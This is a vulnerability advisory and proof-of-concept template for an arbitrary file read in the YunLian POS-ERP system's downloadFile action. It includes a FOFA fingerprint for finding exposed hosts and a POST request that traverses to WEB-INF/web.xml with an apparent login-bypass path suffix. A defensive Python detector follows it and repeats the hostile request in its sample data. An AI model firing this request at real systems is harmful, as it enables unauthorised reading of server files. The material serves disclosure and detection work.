Vulnerability Description
The downloadFile interface of the YunLian POS-ERP Management System has an arbitrary file read vulnerability.
An attacker can read arbitrary files by sending a specially crafted POST request.
FOFA: title="Powered By chaosZ"
id: yunlian-pos-erp-downloadfile-fileread
info:
  name: YunLian POS-ERP DownloadFile Arbitrary File Read
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    The downloadFile interface of the YunLian POS-ERP Management System has an arbitrary file read vulnerability.
    An attacker can read arbitrary files by sending a specially crafted POST request.
    FOFA: title="Powered By chaosZ"
  reference:
    - https://github.com/wy876/POC/blob/main/%E4%BA%91%E8%BF%9EPOS-ERP%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E4%BA%91%E8%BF%9EPOS-ERP%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FdownloadFile%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: yunlian,lfi,fileread
  created: 2024/12/31
rules:
  r0:
    request:
      method: POST
      path: /admin/file!download.action;admin!login.action
      body: downloadFile=../../WEB-INF/web.xml
    expression: response.status == 200 && response.body.bcontains(b'<web-app') && response.body.bcontains(b'</web-app>')
expression: r0()
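A defender-side check that recognizes requests shaped like the template above, added here as an example and not part of the original write-up or template: it flags a downloadFile value that escapes the download root in any request to file!download.action and notes when a ;-path parameter is appended to the action, as in the PoC path. The request record layout (method/path/body dicts) and the sample traffic are constructed for the example; only the action name and parameter name come from the page.

```python
"""Flag requests shaped like the downloadFile file-read PoC (defender side).
Record fields and sample traffic are constructed; action/parameter names are from the PoC."""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

TARGET_ACTION = "file!download.action"   # affected action, from the PoC
PARAM = "downloadFile"                   # parameter it reads, from the PoC

def escapes_root(value: str) -> bool:
    """True if a path value is absolute or climbs above its base directory.
    Depth tracking lets 'a/../b' (stays inside) pass while '../x' is rejected;
    backslashes count as separators so Windows-style traversal is judged too."""
    value = value.replace("\\", "/")
    if value.startswith("/"):
        return True
    depth = 0
    for seg in value.split("/"):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        if depth < 0:
            return True
    return False

def classify(record: dict) -> Optional[str]:
    """Return a reason string if the record matches the PoC shape, else None."""
    parts = urlsplit(record["path"])
    action, _, path_param = parts.path.partition(";")  # ';x' = path parameter
    if not action.endswith(TARGET_ACTION):
        return None
    raw = record.get("body", "") if record["method"].upper() == "POST" else parts.query
    params = parse_qs(raw, keep_blank_values=True)     # also URL-decodes values
    for value in params.get(PARAM, []):
        if escapes_root(value):
            suffix = f"; path parameter ';{path_param}' appended" if path_param else ""
            return f"{PARAM} escapes download root: {value!r}{suffix}"
    return None

SAMPLE_REQUESTS = [  # constructed records, not captured traffic
    {"method": "POST", "path": "/admin/file!download.action;admin!login.action",
     "body": "downloadFile=../../WEB-INF/web.xml"},
    {"method": "POST", "path": "/admin/file!download.action",
     "body": "downloadFile=reports%2F2024%2Fsales.xlsx"},
    {"method": "POST", "path": "/admin/file!download.action",
     "body": "downloadFile=reports/../exports/summary.csv"},
    {"method": "GET", "path": "/admin/user!list.action", "body": ""},
]

def scan(records):
    return [(r["path"], reason) for r in records if (reason := classify(r))]
```

Only the first constructed record is reported; a relative path that uses `..` but stays below the download root is not flagged, which keeps the check usable on legitimate traffic.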